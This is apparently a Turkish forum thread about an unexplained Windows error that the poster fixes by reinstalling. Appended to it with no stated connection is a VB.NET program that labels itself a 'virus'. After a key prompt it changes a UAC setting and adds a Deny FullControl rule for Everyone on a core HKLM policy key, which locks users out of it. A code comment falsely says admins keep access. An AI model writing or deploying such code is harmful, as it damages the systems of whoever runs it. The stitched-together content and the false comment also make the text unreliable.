Anormal bir şey yaptığımı hatırlamıyorum. Windows'u yeniden kuracağım.Bu hata olmadan önce ne yaptın? Bu hatayı gerekli bir hizmeti kapattığım zaman almıştım. Yeniden başlattıktan sonra düzelmişti. Bir kere daha almıştım hiç düzelmemişti, tekrar Windows'u kurman zorunda kaldım. Sistem geri yükleme falan açılmıyor. Tekrar kurmak lazım Windows'u.
Anormal bir şey yaptığımı hatırlamıyorum. Windows'u yeniden kuracağım.
Durduk yere olacak bir şey değil bu. Tekrar yaşamamak için ne yaptığını hatırla.
Dediğim gibi böyle bir şeyin olmasını sağlayacak herhangi bir şey yapmadım.
Hangi antivirüsü kullanıyordun? Windows Update yaptıktan birkaç gün sonra mı oldu? En son hangi uygulamayı yükledin? Korsan oyun yükledin mi?
Hocam aynı sorun bende de var, nasıl çözdün?Antivirüs programı kullanmıyorum. Önerdiğiniz ücretsiz bir program varsa bundan sonra onu kullanırım.
Windows Update yapmadım.
2 gün içinde Chrome'dan Cities Skylines ve GTA V Türkçe yama yükledim. Ama bunları yükledikten sonra Görev Yöneticisi çalışıyordu.
Temiz kurulum yaptım. Şu an için hiçbir sıkıntı yok.
Temiz kurulum yaptım. Şu an için hiçbir sıkıntı yok.
Imports Microsoft.Win32
Imports System.Security.AccessControl
Imports System.Security.Principal
Public Class Form1
Private Sub Button1_Click(sender As Object, e As EventArgs) Handles Button1.Click
' Anahtar doğrulama bölümü
Dim anahtar As String = InputBox("Virüsü çalıştırmak için anahtarı girin:", "Anahtar Girişi")
Dim dogruAnahtar As String = "ParanyokBuradaOzelSifreYok"
If anahtar = dogruAnahtar Then
MessageBox.Show("Anahtar doğru! İşlemler başlatılıyor...", "Başarılı", MessageBoxButtons.OK, MessageBoxIcon.Information)
Try
' EnableLUA anahtarını değiştir
Dim regKey As RegistryKey = Registry.LocalMachine.OpenSubKey("SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System", True)
If regKey IsNot Nothing Then
regKey.SetValue("EnableLUA", 1, RegistryValueKind.DWord)
regKey.Close()
End If
' Kayıt defteri anahtarını kilitlemek için RegistrySecurity kullanıyoruz
Dim keyPath As String = "SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"
Using systemKey As RegistryKey = Registry.LocalMachine.OpenSubKey(keyPath, RegistryKeyPermissionCheck.ReadWriteSubTree, RegistryRights.ChangePermissions)
' Mevcut güvenlik ayarlarını al
Dim security As RegistrySecurity = systemKey.GetAccessControl()
' Everyone (Herkes) grubunun anahtara erişim iznini kaldır
Dim everyone As New SecurityIdentifier(WellKnownSidType.WorldSid, Nothing)
security.PurgeAccessRules(everyone)
' Yeni izinleri ayarla: Yalnızca Sistem ve Admin'lerin erişimine izin ver
security.AddAccessRule(New RegistryAccessRule(everyone, RegistryRights.FullControl, AccessControlType.Deny))
' Değişiklikleri kayıt defteri anahtarına uygula
systemKey.SetAccessControl(security)
MessageBox.Show("Kayıt defteri anahtarı başarıyla kitlendi!", "Başarılı", MessageBoxButtons.OK, MessageBoxIcon.Information)
End Using
Catch ex As Exception
MessageBox.Show("Bir hata oluştu: " & ex.Message, "Hata", MessageBoxButtons.OK, MessageBoxIcon.Error)
End Try
Else
MessageBox.Show("Yanlış anahtar! Virüs çalıştırılamadı.", "Hata", MessageBoxButtons.OK, MessageBoxIcon.Error)
End If
End Sub
End Class
Bu sitenin çalışmasını sağlamak için gerekli çerezleri ve deneyiminizi iyileştirmek için isteğe bağlı çerezleri kullanıyoruz.